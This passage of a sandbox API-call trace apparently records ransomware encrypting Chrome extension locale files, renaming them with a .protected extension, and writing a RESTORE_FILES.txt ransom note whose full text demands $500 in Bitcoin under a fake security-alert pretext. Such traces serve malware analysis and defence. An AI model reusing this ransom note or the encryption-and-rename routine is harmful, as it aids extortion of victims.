data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.406] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json") returned 155 [0081.407] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.407] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json") returned 155 [0081.407] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.407] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json") returned 155 [0081.407] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.407] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x100, lpOverlapped=0x0) returned 1 [0081.408] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.408] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x100, lpOverlapped=0x0) returned 1 [0081.408] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.408] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.408] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.408] CloseHandle (hObject=0x168) returned 1 [0081.408] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json.protected") returned 165 [0081.408] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json.protected")) returned 1 [0081.409] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.409] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.409] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\RESTORE_FILES.txt") returned 159 [0081.409] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.410] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.410] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.411] lstrlenA (lpString="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") returned 684 [0081.411] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.411] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.411] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0081.411] CloseHandle (hObject=0x164) returned 1 [0081.411] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.411] lstrcmpiW (lpString1="fil", lpString2="Windows") returned -1 [0081.411] lstrcmpiW (lpString1="fil", lpString2="Program Files") returned -1 [0081.411] lstrcmpiW (lpString1="fil", lpString2="Program Files (x86)") returned -1 [0081.411] lstrcmpiW (lpString1="fil", lpString2="$Recycle.bin") returned 1 [0081.412] lstrcmpiW (lpString1="fil", lpString2="System Volume Information") returned -1 [0081.412] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil") returned 142 [0081.412] lstrcmpW (lpString1="fil", lpString2=".") returned 1 [0081.412] lstrcmpW (lpString1="fil", lpString2="..") returned 1 [0081.412] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\*") returned 144 [0081.412] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.413] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.413] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.413] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.413] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.413] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.413] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, 
pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\.") returned 144 [0081.413] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.413] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.413] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.413] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.413] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.413] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.413] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.413] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\..") returned 145 [0081.413] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.413] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.413] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.413] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.413] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.413] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.413] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.414] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.414] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json") returned 156 [0081.414] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.414] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.414] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.414] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.414] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.415] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json") returned 156 [0081.415] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.415] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json") returned 156 [0081.415] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.415] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json") returned 156 [0081.415] StrStrW 
(lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.415] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xea, lpOverlapped=0x0) returned 1 [0081.416] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff16, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.416] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xea, lpOverlapped=0x0) returned 1 [0081.416] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.416] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.417] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.417] CloseHandle (hObject=0x168) returned 1 [0081.417] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json.protected") returned 166 [0081.417] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 
data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json.protected")) returned 1 [0081.418] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.418] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.418] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\RESTORE_FILES.txt") returned 160 [0081.418] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.418] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.418] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.419] lstrlenA (lpString="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") returned 684 [0081.419] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 
[0081.420] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.420] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.420] CloseHandle (hObject=0x164) returned 1 [0081.420] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.420] lstrcmpiW (lpString1="fr", lpString2="Windows") returned -1 [0081.420] lstrcmpiW (lpString1="fr", lpString2="Program Files") returned -1 [0081.420] lstrcmpiW (lpString1="fr", lpString2="Program Files (x86)") returned -1 [0081.420] lstrcmpiW (lpString1="fr", lpString2="$Recycle.bin") returned 1 [0081.420] lstrcmpiW (lpString1="fr", lpString2="System Volume Information") returned -1 [0081.420] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr") returned 141 [0081.420] lstrcmpW (lpString1="fr", lpString2=".") returned 1 [0081.420] lstrcmpW (lpString1="fr", lpString2="..") returned 1 [0081.420] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\*") returned 143 [0081.420] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.420] lstrcmpiW 
(lpString1=".", lpString2="Windows") returned -1 [0081.420] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.420] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.420] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.420] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.420] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\.") returned 143 [0081.420] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.420] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.421] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.421] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.421] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.421] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.421] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.421] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\..") returned 144 [0081.421] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.421] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.421] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.421] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.421] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.421] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 
[0081.421] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.421] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.421] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json") returned 155 [0081.421] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.421] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.421] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.421] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.421] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.422] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json") returned 155 [0081.422] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.422] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json") returned 155 [0081.422] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.422] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json") returned 155 [0081.422] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.422] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x10c, lpOverlapped=0x0) returned 1 [0081.423] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffef4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.423] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x10c, lpOverlapped=0x0) returned 1 [0081.423] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.423] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.423] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.423] CloseHandle (hObject=0x168) returned 1 [0081.423] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
